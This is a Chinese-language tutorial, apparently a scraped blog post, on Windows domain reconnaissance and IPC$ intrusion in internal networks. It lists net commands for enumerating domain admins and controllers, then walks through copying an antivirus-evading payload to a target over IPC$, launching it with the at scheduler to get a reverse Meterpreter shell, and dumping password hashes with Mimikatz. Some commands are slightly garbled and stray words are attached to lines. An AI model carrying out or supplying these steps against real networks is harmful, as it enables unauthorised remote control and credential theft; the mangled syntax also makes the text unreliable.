內網IPC$入侵

1、域操做相關的命令
1.查看域用戶windows

net user/domain
2.查看有幾個域服務器

net view/domain
3.查看域內的主機dom

net view/domain: XXX
4.查看域裏面的組工具

net group/domain
5.查看域內全部的主機名post

net group "domain computers" /domain
6.查看域管理員操作系統

net group "domain admins" /domain
7.查看域控制器blog

net group "domain controllers" /domain
8.查看企業管理組進程

net group "enterprise admins" /domain
9.查看時間服務器ip

nettime/domain
2、IPC$入侵
IPC$入侵,即經過使用Windows系統默認啓動的IPC$共享得到計算機控制權的入侵,在內網中及其常見。
假設如今有一臺IPC$主機:127.0.0.25,輸入如下命令。hash

#鏈接127.0.0.25的IPC$共享:
D:>net use \127.0.0.25\ipc$
#複製srv.exe到目標主機
D:>copy srv.exe \127.0.0.25\ipc$
#查時間
D:>net time\127.0.0.25
#用at命令在10點50分啓動srv.exe(注意這裏設置的時間比主機時間快)
D:>at \127.0.0.25 10:50 srv.exe
上述命令中的at就是讓計算機在指定的時間作指定事情的命令(例如運行程序)

這裏把免殺的Payload上傳到PAVMSEP131服務器,而後利用at命令啓動Payload,反彈回Meterpreter Shell
將木馬複製到目標服務器

查看系統時間

使用at命令啓動木馬

接着返回handler監聽,能夠看到反彈成功了,咱們得到了PAVMSEP131服務器的Meterpreter Shell
反彈成功

下面看看PAVMSEP131服務器的信息和如今的權限
查看系統信息

能夠看到有SYSTEM權限,說明既能夠使用Mimikatz等工具,也能夠輸入 run post/windows/gather/hashdump來抓Hash
在用Mimikatz抓Hash前要注意一點:若是服務器安裝的是64位操做系統,要把Mimikatz的進程遷移到一個64位的程序進程中,才能查看64位操做系統的密碼明文,在32位系統中就沒有這個限制。

這裏使用Mimikatz抓Hash

上傳Mimikatz

抓取Hash

查看抓到的域用戶的權限

相關文章
相關標籤/搜索